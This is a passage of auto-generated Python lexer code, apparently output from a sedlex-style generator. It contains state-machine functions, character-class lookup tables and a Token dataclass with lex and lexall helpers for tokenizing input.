_sedlex_st_55(lexerbuf) return result def _sedlex_st_53(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_20(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_132[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_131(lexerbuf: lexbuf): result = -1 result = _sedlex_st_54(lexerbuf) return result def _sedlex_rnd_130(lexerbuf: lexbuf): result = -1 result = _sedlex_st_52(lexerbuf) return result def _sedlex_st_52(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_21(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_129[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_21(c: int): if c <= -1: return -1 else: if c <= 93: return _sedlex_DT_table_14[c - 0] - 1 else: return 0 def _sedlex_rnd_128(lexerbuf: lexbuf): result = -1 result = _sedlex_st_58(lexerbuf) return result def _sedlex_rnd_127(lexerbuf: lexbuf): result = -1 result = _sedlex_st_53(lexerbuf) return result def _sedlex_rnd_126(lexerbuf: lexbuf): result = -1 result = _sedlex_st_52(lexerbuf) return result def _sedlex_st_50(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_20(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_125[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_20(c: int): if c <= -1: return -1 else: if c <= 93: return _sedlex_DT_table_13[c - 0] - 1 else: return 0 def _sedlex_rnd_124(lexerbuf: lexbuf): result = -1 result = 60 return result def _sedlex_rnd_123(lexerbuf: lexbuf): result = -1 result = _sedlex_st_49(lexerbuf) return result def _sedlex_st_49(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_19(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_122[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_19(c: int): if c <= -1: return -1 else: if c <= 61: return _sedlex_DT_table_12[c - 0] - 1 else: return 0 def _sedlex_rnd_121(lexerbuf: lexbuf): result = -1 result = _sedlex_st_50(lexerbuf) return result def _sedlex_rnd_120(lexerbuf: lexbuf): result = -1 result = _sedlex_st_49(lexerbuf) return result def _sedlex_st_48(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_18(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_119[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_18(c: int): if c <= -1: return -1 else: if c <= 91: return _sedlex_DT_table_11[c - 0] - 1 else: return 0 def _sedlex_rnd_118(lexerbuf: lexbuf): result = -1 result = _sedlex_st_52(lexerbuf) return result def _sedlex_rnd_117(lexerbuf: lexbuf): result = -1 result = _sedlex_st_50(lexerbuf) return result def _sedlex_rnd_116(lexerbuf: lexbuf): result = -1 result = _sedlex_st_49(lexerbuf) return result def _sedlex_st_47(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 25) state_id = _sedlex_decide_17(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_115[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_17(c: int): if c <= 60: return -1 else: if c <= 91: return _sedlex_DT_table_10[c - 61] - 1 else: return -1 def _sedlex_rnd_114(lexerbuf: lexbuf): result = -1 result = _sedlex_st_60(lexerbuf) return result def _sedlex_rnd_113(lexerbuf: lexbuf): result = -1 result = _sedlex_st_48(lexerbuf) return result def _sedlex_st_46(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_112[state_id](lexerbuf) else: result = backtrack(lexerbuf) 
return result def _sedlex_rnd_111(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_45(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_110[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_16(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_9[c - 48] - 1 else: return -1 def _sedlex_rnd_109(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_42(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 22) state_id = _sedlex_decide_15(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_108[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_15(c: int): if c <= 60: return -1 else: if c <= 62: return _sedlex_DT_table_8[c - 61] - 1 else: return -1 def _sedlex_rnd_107(lexerbuf: lexbuf): result = -1 result = 24 return result def _sedlex_rnd_106(lexerbuf: lexbuf): result = -1 result = 23 return result def _sedlex_st_40(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 20) state_id = _sedlex_decide_14(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_105[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_14(c: int): if c <= 60: return -1 else: if c <= 61: return 0 else: return -1 def _sedlex_rnd_104(lexerbuf: lexbuf): result = -1 result = 21 return result def _sedlex_st_37(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 17) state_id = _sedlex_decide_13(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_103[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_13(c: int): if c <= 59: return -1 else: if c <= 61: return _sedlex_DT_table_8[c - 60] - 1 else: return -1 def _sedlex_rnd_102(lexerbuf: lexbuf): result = -1 result = 19 return result def _sedlex_rnd_101(lexerbuf: lexbuf): result = -1 result = 18 return result def _sedlex_st_34(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 14) state_id = _sedlex_decide_12(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_100[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_12(c: int): if c <= 57: return -1 else: if c <= 58: return 0 else: return -1 def _sedlex_rnd_99(lexerbuf: lexbuf): result = -1 result = 15 return result def _sedlex_st_33(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 58) state_id = _sedlex_decide_10(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_98[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_97(lexerbuf: lexbuf): result = -1 result = _sedlex_st_28(lexerbuf) return result def _sedlex_rnd_96(lexerbuf: lexbuf): result = -1 result = _sedlex_st_30(lexerbuf) return result def _sedlex_rnd_95(lexerbuf: lexbuf): result = -1 result = _sedlex_st_26(lexerbuf) return result def _sedlex_st_32(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 58) state_id = _sedlex_decide_11(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_94[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_93(lexerbuf: lexbuf): result = -1 result = _sedlex_st_32(lexerbuf) return result def _sedlex_st_31(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_11(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_92[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_11(c: int): if c <= 47: return -1 else: if 
c <= 122: return _sedlex_DT_table_7[c - 48] - 1 else: return -1 def _sedlex_rnd_91(lexerbuf: lexbuf): result = -1 result = _sedlex_st_32(lexerbuf) return result def _sedlex_st_30(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 58) state_id = _sedlex_decide_10(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_90[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_10(c: int): if c <= 45: return -1 else: if c <= 101: return _sedlex_DT_table_6[c - 46] - 1 else: return -1 def _sedlex_rnd_89(lexerbuf: lexbuf): result = -1 result = _sedlex_st_28(lexerbuf) return result def _sedlex_rnd_88(lexerbuf: lexbuf): result = -1 result = _sedlex_st_30(lexerbuf) return result def _sedlex_rnd_87(lexerbuf: lexbuf): result = -1 result = _sedlex_st_26(lexerbuf) return result def _sedlex_st_29(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 58) state_id = _sedlex_decide_8(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_86[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_85(lexerbuf: lexbuf): result = -1 result = _sedlex_st_29(lexerbuf) return result def _sedlex_st_28(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_8(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_84[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_83(lexerbuf: lexbuf): result = -1 result = _sedlex_st_29(lexerbuf) return result def _sedlex_st_27(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 58) state_id = _sedlex_decide_9(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_82[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_9(c: int): if c <= 47: return -1 else: if c <= 101: return _sedlex_DT_table_5[c - 48] - 1 else: return -1 def _sedlex_rnd_81(lexerbuf: lexbuf): result = -1 result = _sedlex_st_28(lexerbuf) return result def _sedlex_rnd_80(lexerbuf: lexbuf): result = -1 result = _sedlex_st_27(lexerbuf) return result def _sedlex_st_26(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_8(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_79[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_8(c: int): if c <= 47: return -1 else: if c <= 57: return 0 else: return -1 def _sedlex_rnd_78(lexerbuf: lexbuf): result = -1 result = _sedlex_st_27(lexerbuf) return result def _sedlex_st_25(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 58) state_id = _sedlex_decide_7(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_77[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_7(c: int): if c <= 45: return -1 else: if c <= 120: return _sedlex_DT_table_4[c - 46] - 1 else: return -1 def _sedlex_rnd_76(lexerbuf: lexbuf): result = -1 result = _sedlex_st_31(lexerbuf) return result def _sedlex_rnd_75(lexerbuf: lexbuf): result = -1 result = _sedlex_st_28(lexerbuf) return result def _sedlex_rnd_74(lexerbuf: lexbuf): result = -1 result = _sedlex_st_30(lexerbuf) return result def _sedlex_rnd_73(lexerbuf: lexbuf): result = -1 result = _sedlex_st_26(lexerbuf) return result def _sedlex_st_23(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 12) state_id = _sedlex_decide_6(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_72[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_6(c: int): if c <= 46: return -1 else: if c <= 47: return 0 else: return -1 def _sedlex_rnd_71(lexerbuf: lexbuf): result = -1 result = 13 
return result def _sedlex_st_21(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 10) state_id = _sedlex_decide_5(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_70[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_69(lexerbuf: lexbuf): result = -1 result = 11 return result def _sedlex_st_20(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 9) state_id = _sedlex_decide_5(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_68[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_5(c: int): if c <= 45: return -1 else: if c <= 46: return 0 else: return -1 def _sedlex_rnd_67(lexerbuf: lexbuf): result = -1 result = _sedlex_st_21(lexerbuf) return result def _sedlex_st_18(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_4(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_66[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_4(c: int): if c <= -1: return -1 else: if c <= 10: return _sedlex_DT_table_3[c - 0] - 1 else: return 0 def _sedlex_rnd_65(lexerbuf: lexbuf): result = -1 result = 55 return result def _sedlex_rnd_64(lexerbuf: lexbuf): result = -1 result = _sedlex_st_18(lexerbuf) return result def _sedlex_st_17(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 8) state_id = _sedlex_decide_3(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_63[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_3(c: int): if c <= 44: return -1 else: if c <= 45: return 0 else: return -1 def _sedlex_rnd_62(lexerbuf: lexbuf): result = -1 result = _sedlex_st_18(lexerbuf) return result def _sedlex_st_8(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 59) state_id = _sedlex_decide_2(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_61[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_60(lexerbuf: lexbuf): result = -1 result = _sedlex_st_7(lexerbuf) return result def _sedlex_rnd_59(lexerbuf: lexbuf): result = -1 result = 59 return result def _sedlex_rnd_58(lexerbuf: lexbuf): result = -1 result = _sedlex_st_5(lexerbuf) return result def _sedlex_st_7(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_2(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_57[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_56(lexerbuf: lexbuf): result = -1 result = _sedlex_st_7(lexerbuf) return result def _sedlex_rnd_55(lexerbuf: lexbuf): result = -1 result = _sedlex_st_8(lexerbuf) return result def _sedlex_rnd_54(lexerbuf: lexbuf): result = -1 result = _sedlex_st_5(lexerbuf) return result def _sedlex_st_5(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_2(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_53[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_52(lexerbuf: lexbuf): result = -1 result = _sedlex_st_7(lexerbuf) return result def _sedlex_rnd_51(lexerbuf: lexbuf): result = -1 result = 59 return result def _sedlex_rnd_50(lexerbuf: lexbuf): result = -1 result = _sedlex_st_5(lexerbuf) return result def _sedlex_st_4(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 61) state_id = _sedlex_decide_2(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_49[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_2(c: int): if c <= -1: return -1 else: if c <= 92: return _sedlex_DT_table_2[c - 0] - 1 else: return 0 def _sedlex_rnd_48(lexerbuf: 
lexbuf): result = -1 result = _sedlex_st_7(lexerbuf) return result def _sedlex_rnd_47(lexerbuf: lexbuf): result = -1 result = 59 return result def _sedlex_rnd_46(lexerbuf: lexbuf): result = -1 result = _sedlex_st_5(lexerbuf) return result def _sedlex_st_0(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_1(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_45[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_1(c: int): if c <= 126: return _sedlex_DT_table_1[c - -1] - 1 else: return 1 def _sedlex_rnd_44(lexerbuf: lexbuf): result = -1 result = _sedlex_st_145(lexerbuf) return result def _sedlex_rnd_43(lexerbuf: lexbuf): result = -1 result = 52 return result def _sedlex_rnd_42(lexerbuf: lexbuf): result = -1 result = 51 return result def _sedlex_rnd_41(lexerbuf: lexbuf): result = -1 result = 50 return result def _sedlex_rnd_40(lexerbuf: lexbuf): result = -1 result = _sedlex_st_137(lexerbuf) return result def _sedlex_rnd_39(lexerbuf: lexbuf): result = -1 result = _sedlex_st_132(lexerbuf) return result def _sedlex_rnd_38(lexerbuf: lexbuf): result = -1 result = _sedlex_st_125(lexerbuf) return result def _sedlex_rnd_37(lexerbuf: lexbuf): result = -1 result = _sedlex_st_115(lexerbuf) return result def _sedlex_rnd_36(lexerbuf: lexbuf): result = -1 result = _sedlex_st_113(lexerbuf) return result def _sedlex_rnd_35(lexerbuf: lexbuf): result = -1 result = _sedlex_st_108(lexerbuf) return result def _sedlex_rnd_34(lexerbuf: lexbuf): result = -1 result = _sedlex_st_103(lexerbuf) return result def _sedlex_rnd_33(lexerbuf: lexbuf): result = -1 result = _sedlex_st_100(lexerbuf) return result def _sedlex_rnd_32(lexerbuf: lexbuf): result = -1 result = _sedlex_st_96(lexerbuf) return result def _sedlex_rnd_31(lexerbuf: lexbuf): result = -1 result = _sedlex_st_82(lexerbuf) return result def _sedlex_rnd_30(lexerbuf: lexbuf): result = -1 result = _sedlex_st_74(lexerbuf) return result def _sedlex_rnd_29(lexerbuf: lexbuf): result = -1 result = _sedlex_st_72(lexerbuf) return result def _sedlex_rnd_28(lexerbuf: lexbuf): result = -1 result = _sedlex_st_67(lexerbuf) return result def _sedlex_rnd_27(lexerbuf: lexbuf): result = -1 result = _sedlex_st_64(lexerbuf) return result def _sedlex_rnd_26(lexerbuf: lexbuf): result = -1 result = 27 return result def _sedlex_rnd_25(lexerbuf: lexbuf): result = -1 result = 26 return result def _sedlex_rnd_24(lexerbuf: lexbuf): result = -1 result = _sedlex_st_47(lexerbuf) return result def _sedlex_rnd_23(lexerbuf: lexbuf): result = -1 result = _sedlex_st_45(lexerbuf) return result def _sedlex_rnd_22(lexerbuf: lexbuf): result = -1 result = _sedlex_st_42(lexerbuf) return result def _sedlex_rnd_21(lexerbuf: lexbuf): result = -1 result = _sedlex_st_40(lexerbuf) return result def _sedlex_rnd_20(lexerbuf: lexbuf): result = -1 result = _sedlex_st_37(lexerbuf) return result def _sedlex_rnd_19(lexerbuf: lexbuf): result = -1 result = 16 return result def _sedlex_rnd_18(lexerbuf: lexbuf): result = -1 result = _sedlex_st_34(lexerbuf) return result def _sedlex_rnd_17(lexerbuf: lexbuf): result = -1 result = _sedlex_st_33(lexerbuf) return result def _sedlex_rnd_16(lexerbuf: lexbuf): result = -1 result = _sedlex_st_25(lexerbuf) return result def _sedlex_rnd_15(lexerbuf: lexbuf): result = -1 result = _sedlex_st_23(lexerbuf) return result def _sedlex_rnd_14(lexerbuf: lexbuf): result = -1 result = _sedlex_st_20(lexerbuf) return result def _sedlex_rnd_13(lexerbuf: lexbuf): result = -1 result = _sedlex_st_17(lexerbuf) return result def 
_sedlex_rnd_12(lexerbuf: lexbuf): result = -1 result = 7 return result def _sedlex_rnd_11(lexerbuf: lexbuf): result = -1 result = 6 return result def _sedlex_rnd_10(lexerbuf: lexbuf): result = -1 result = 5 return result def _sedlex_rnd_9(lexerbuf: lexbuf): result = -1 result = 4 return result def _sedlex_rnd_8(lexerbuf: lexbuf): result = -1 result = 3 return result def _sedlex_rnd_7(lexerbuf: lexbuf): result = -1 result = 2 return result def _sedlex_rnd_6(lexerbuf: lexbuf): result = -1 result = 1 return result def _sedlex_rnd_5(lexerbuf: lexbuf): result = -1 result = 0 return result def _sedlex_rnd_4(lexerbuf: lexbuf): result = -1 result = _sedlex_st_4(lexerbuf) return result def _sedlex_rnd_3(lexerbuf: lexbuf): result = -1 result = 56 return result def _sedlex_rnd_2(lexerbuf: lexbuf): result = -1 result = 61 return result def _sedlex_rnd_1(lexerbuf: lexbuf): result = -1 result = 62 return result @dataclasses.dataclass class Token: token_id: int lexeme : str line: int col: int span: int offset: int file: str _Token = typing.TypeVar("_Token") class TokenConstructor(typing_extensions.Protocol[_Token]): def __call__(self, token_id: int, lexeme: str, line: int, col: int, span: int, offset: int, file: str) -> _Token: ... def lex(lexerbuf: lexbuf , construct_token: TokenConstructor[_Token]=Token): start(lexerbuf) case_id = _sedlex_st_0(lexerbuf) if case_id < 0: raise Exception("the last branch must be a catch-all error case!") token_id = _sedlex_rnd_379[case_id] if token_id is not None: return construct_token(token_id, lexeme(lexerbuf), lexerbuf.start_line, lexerbuf.pos - lexerbuf.curr_bol, lexerbuf.pos - lexerbuf.start_pos, lexerbuf.start_pos, lexerbuf.filename) return None def lexall(buf: lexbuf, construct: TokenConstructor[_Token], is_eof: Callable[[_Token], bool]): while True: token = lex(buf, construct) if token is None: continue if is_eof(token): break yield token _sedlex_rnd_378 = [_sedlex_rnd_377] _sedlex_rnd_376 = [_sedlex_rnd_375] _sedlex_rnd_374 = [_sedlex_rnd_372, _sedlex_rnd_373] _sedlex_rnd_371 = [_sedlex_rnd_369, _sedlex_rnd_370] _sedlex_rnd_368 = [_sedlex_rnd_366, _sedlex_rnd_367] _sedlex_DT_table_35 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_365 = [_sedlex_rnd_363, _sedlex_rnd_364] _sedlex_rnd_362 = [_sedlex_rnd_361] _sedlex_rnd_360 = [_sedlex_rnd_358, _sedlex_rnd_359] _sedlex_rnd_357 = [_sedlex_rnd_355, _sedlex_rnd_356] _sedlex_rnd_354 = [_sedlex_rnd_352, _sedlex_rnd_353] _sedlex_rnd_351 = [_sedlex_rnd_349, _sedlex_rnd_350] _sedlex_rnd_348 = [_sedlex_rnd_347] _sedlex_rnd_346 = [_sedlex_rnd_344, _sedlex_rnd_345] _sedlex_rnd_343 = [_sedlex_rnd_341, _sedlex_rnd_342] _sedlex_rnd_340 = [_sedlex_rnd_339] _sedlex_rnd_338 = [_sedlex_rnd_336, _sedlex_rnd_337] _sedlex_rnd_335 = [_sedlex_rnd_333, _sedlex_rnd_334] _sedlex_DT_table_34 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_332 = [_sedlex_rnd_329, _sedlex_rnd_330, _sedlex_rnd_331] _sedlex_rnd_328 = [_sedlex_rnd_327] _sedlex_rnd_326 = [_sedlex_rnd_324, _sedlex_rnd_325] _sedlex_rnd_323 = [_sedlex_rnd_321, _sedlex_rnd_322] _sedlex_DT_table_33 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 
1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1] _sedlex_rnd_320 = [_sedlex_rnd_318, _sedlex_rnd_319] _sedlex_rnd_317 = [_sedlex_rnd_316] _sedlex_rnd_315 = [_sedlex_rnd_313, _sedlex_rnd_314] _sedlex_rnd_312 = [_sedlex_rnd_310, _sedlex_rnd_311] _sedlex_rnd_309 = [_sedlex_rnd_307, _sedlex_rnd_308] _sedlex_DT_table_32 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1] _sedlex_rnd_306 = [_sedlex_rnd_303, _sedlex_rnd_304, _sedlex_rnd_305] _sedlex_rnd_302 = [_sedlex_rnd_300, _sedlex_rnd_301] _sedlex_rnd_299 = [_sedlex_rnd_298] _sedlex_rnd_297 = [_sedlex_rnd_295, _sedlex_rnd_296] _sedlex_rnd_294 = [_sedlex_rnd_293] _sedlex_rnd_292 = [_sedlex_rnd_290, _sedlex_rnd_291] _sedlex_rnd_289 = [_sedlex_rnd_288] _sedlex_rnd_287 = [_sedlex_rnd_285, _sedlex_rnd_286] _sedlex_DT_table_31 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_284 = [_sedlex_rnd_281, _sedlex_rnd_282, _sedlex_rnd_283] _sedlex_rnd_280 = [_sedlex_rnd_279] _sedlex_rnd_278 = [_sedlex_rnd_276, _sedlex_rnd_277] _sedlex_rnd_275 = [_sedlex_rnd_273, _sedlex_rnd_274] _sedlex_rnd_272 = [_sedlex_rnd_270, _sedlex_rnd_271] _sedlex_rnd_269 = [_sedlex_rnd_267, _sedlex_rnd_268] _sedlex_rnd_266 = [_sedlex_rnd_265] _sedlex_rnd_264 = [_sedlex_rnd_263] _sedlex_DT_table_30 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_262 = [_sedlex_rnd_259, _sedlex_rnd_260, _sedlex_rnd_261] _sedlex_rnd_258 = [_sedlex_rnd_257] _sedlex_rnd_256 = [_sedlex_rnd_254, _sedlex_rnd_255] _sedlex_rnd_253 = [_sedlex_rnd_251, _sedlex_rnd_252] _sedlex_rnd_250 = [_sedlex_rnd_248, _sedlex_rnd_249] _sedlex_rnd_247 = [_sedlex_rnd_246] _sedlex_rnd_245 = [_sedlex_rnd_243, _sedlex_rnd_244] _sedlex_rnd_242 = [_sedlex_rnd_240, _sedlex_rnd_241] _sedlex_rnd_239 = [_sedlex_rnd_237, _sedlex_rnd_238] _sedlex_DT_table_29 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1] _sedlex_rnd_236 = [_sedlex_rnd_234, _sedlex_rnd_235] _sedlex_DT_table_28 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_233 = [_sedlex_rnd_231, _sedlex_rnd_232] _sedlex_rnd_230 = [_sedlex_rnd_228, _sedlex_rnd_229] _sedlex_rnd_227 = [_sedlex_rnd_226] _sedlex_rnd_225 = [_sedlex_rnd_223, _sedlex_rnd_224] _sedlex_rnd_222 = [_sedlex_rnd_221] _sedlex_rnd_220 = [_sedlex_rnd_218, _sedlex_rnd_219] _sedlex_rnd_217 = [_sedlex_rnd_215, _sedlex_rnd_216] _sedlex_DT_table_27 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_214 = [_sedlex_rnd_212, _sedlex_rnd_213] 
